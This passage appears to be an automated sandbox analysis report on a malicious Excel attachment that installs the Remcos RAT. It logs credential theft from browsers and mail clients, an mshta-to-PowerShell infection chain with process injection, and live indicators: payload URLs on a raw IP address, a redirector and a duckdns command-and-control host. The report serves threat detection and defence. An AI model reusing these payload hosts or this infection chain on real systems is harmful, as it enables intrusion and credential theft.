          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword41_2_004033F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword41_2_00402DB3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword41_2_00402DB3
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3900, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RXIGCE
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting
          Valid Accounts11
          Native API
          111
          Scripting
          1
          DLL Side-Loading
          11
          Deobfuscate/Decode Files or Information
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          3
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts23
          Exploitation for Client Execution
          1
          DLL Side-Loading
          1
          Access Token Manipulation
          21
          Obfuscated Files or Information
          2
          Credentials in Registry
          1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts123
          Command and Scripting Interpreter
          Logon Script (Windows)311
          Process Injection
          1
          Install Root Certificate
          1
          Credentials In Files
          3
          File and Directory Discovery
          SMB/Windows Admin Shares21
          Email Collection
          1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts4
          PowerShell
          Login HookLogin Hook1
          DLL Side-Loading
          NTDS19
          System Information Discovery
          Distributed Component Object Model3
          Clipboard Data
          1
          Remote Access Software
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets1
          Security Software Discovery
          SSHKeylogging2
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Virtualization/Sandbox Evasion
          Cached Domain Credentials21
          Virtualization/Sandbox Evasion
          VNCGUI Input Capture113
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
          Process Injection
          Proc Filesystem1
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          Remote System Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545826 Sample: A & C Metrology  OC 5457146... Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 115 Suricata IDS alerts for network traffic 2->115 117 Malicious sample detected (through community Yara rule) 2->117 119 Multi AV Scanner detection for submitted file 2->119 121 19 other signatures 2->121 12 EXCEL.EXE 57 40 2->12         started        process3 dnsIp4 103 107.174.146.46, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 12->103 105 acesso.run 172.67.162.95, 443, 49161, 49168 CLOUDFLARENETUS United States 12->105 81 A & C Metrology  O...ateriale.xls (copy), Composite 12->81 dropped 83 ernashgetmebackwit...grreatthings[1].hta, HTML 12->83 dropped 157 Microsoft Office drops suspicious files 12->157 17 mshta.exe 10 12->17         started        21 mshta.exe 12->21         started        file5 signatures6 process7 dnsIp8 85 104.21.74.191, 443, 49163, 49170 CLOUDFLARENETUS United States 17->85 87 acesso.run 17->87 123 Suspicious powershell command line found 17->123 125 PowerShell case anomaly found 17->125 23 powershell.exe 24 17->23         started        89 acesso.run 21->89 27 powershell.exe 21->27         started        signatures9 process10 file11 77 picturewithgreatne...hgoodthingsonbe.vbs, Unicode 23->77 dropped 79 C:\Users\user\AppData\...\xcygtrxb.cmdline, Unicode 23->79 dropped 131 Suspicious powershell command line found 23->131 133 Obfuscated command line found 23->133 29 wscript.exe 1 23->29         started        32 powershell.exe 4 23->32         started        34 csc.exe 2 23->34         started        37 wscript.exe 27->37         started        39 csc.exe 27->39         started        41 powershell.exe 27->41         started        signatures12 process13 file14 147 Suspicious powershell command line found 29->147 149 Wscript starts Powershell (via cmd or directly) 29->149 151 Bypasses PowerShell execution policy 29->151 155 2 other signatures 29->155 43 powershell.exe 2 29->43         started        153 Installs new ROOT certificates 32->153 73 C:\Users\user\AppData\Local\...\xcygtrxb.dll, PE32 34->73 dropped 46 cvtres.exe 34->46         started        48 powershell.exe 37->48         started        75 C:\Users\user\AppData\Local\...\revod450.dll, PE32 39->75 dropped 50 cvtres.exe 39->50         started        signatures15 process16 signatures17 135 Suspicious powershell command line found 43->135 137 Obfuscated command line found 43->137 52 powershell.exe 12 4 43->52         started        56 powershell.exe 48->56         started        process18 dnsIp19 91 drive.google.com 142.250.184.206, 443, 49166, 49173 GOOGLEUS United States 52->91 93 drive.usercontent.google.com 142.250.185.65, 443, 49167 GOOGLEUS United States 52->93 127 Writes to foreign memory regions 52->127 129 Injects a PE file into a foreign processes 52->129 58 CasPol.exe 52->58         started        62 CasPol.exe 52->62         started        95 172.217.16.193, 443, 49175 GOOGLEUS United States 56->95 signatures20 process21 dnsIp22 97 seemebest2024rmc.duckdns.org 58->97 99 seemebest2024rmc.duckdns.org 107.175.130.20, 14645, 49176, 49178 AS-COLOCROSSINGUS United States 58->99 101 geoplugin.net 178.237.33.50, 49177, 80 ATOM86-ASATOM86NL Netherlands 58->101 139 Detected Remcos RAT 58->139 141 Maps a DLL or memory area into another process 58->141 64 CasPol.exe 58->64         started        67 CasPol.exe 58->67         started        69 CasPol.exe 58->69         started        71 17 other processes 58->71 143 Tries to steal Mail credentials (via file registry) 62->143 signatures23 145 Uses dynamic DNS services 97->145 process24 signatures25 107 Tries to steal Instant Messenger accounts or passwords 64->107 109 Tries to steal Mail credentials (via file / registry access) 64->109 111 Searches for Windows Mail specific files 64->111 113 Tries to harvest and steal browser information (history, passwords, etc) 69->113

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          A & C Metrology OC 545714677889Materiale.xls22%ReversingLabsWin32.Exploit.CVE-2017-0199
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.imvu.comr0%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://www.imvu.com0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%URL Reputationsafe
          http://go.micros0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://login.yahoo.com/config/login0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://crl.entrust.net/server1.crl00%URL Reputationsafe
          http://geoplugin.net/json.gp0%URL Reputationsafe
          https://secure.comodo.com/CPS00%URL Reputationsafe
          http://www.ebuddy.com0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          acesso.run
          172.67.162.95
          truefalse
            unknown
            geoplugin.net
            178.237.33.50
            truefalse
              unknown
              drive.google.com
              142.250.184.206
              truefalse
                unknown
                drive.usercontent.google.com
                142.250.185.65
                truefalse
                  unknown
                  seemebest2024rmc.duckdns.org
                  107.175.130.20
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainfalse
                      unknown
                      http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFtrue
                        unknown
                        http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htatrue
                          unknown
                          http://107.174.146.46/57/RFGGVFRR.txttrue
                            unknown
                            http://geoplugin.net/json.gpfalse
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainJ4mshta.exe, 00000004.00000003.406433145.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaepC:mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://www.imvu.comrCasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv417.tmp.31.drfalse
                                  unknown
                                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                    unknown
                                    http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaainmshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.0000000000391000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainZ4mshta.exe, 00000004.00000002.412282901.000000000010A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                            unknown
                                            http://www.nirsoft.netCasPol.exe, 0000001F.00000002.512443413.00000000003A4000.00000004.00000010.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.519745743.00000000001AF000.00000004.00000010.00020000.00000000.sdmpfalse
                                              unknown
                                              https://deff.nelreports.net/api/report?cat=msnbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaNmshta.exe, 00000004.00000002.413132932.0000000003633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411691623.0000000003633000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaEmshta.exe, 00000004.00000002.413132932.0000000003633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411691623.0000000003633000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htahttp://107.174.146.46/5mshta.exe, 00000004.00000003.410387499.0000000003195000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.408514038.0000000003195000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463384059.0000000003275000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.461250069.0000000003275000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://cache.btrll.com/default/Pix-1x1.gifbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                      unknown
                                                      https://www.google.comCasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        unknown
                                                        http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...Q5mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestraino4mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://o.aolcdn.com/ads/adswrappermsni.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                              unknown
                                                              http://www.msn.com/?ocid=iehpbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                unknown
                                                                http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://static.chartbeat.com/js/chartbeat.jsbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                    unknown
                                                                    http://www.msn.com/de-de/?ocid=iehpbhv2DF4.tmp.46.dr, bhv417.tmp.31.drfalse
                                                                      unknown
                                                                      http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htalmshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainyXmshta.exe, 00000010.00000002.463967670.000000000035A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://107.174.146.46/57/picturepowershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000002555000.00000004.00000800.00020000.00000000.sdmpfalse
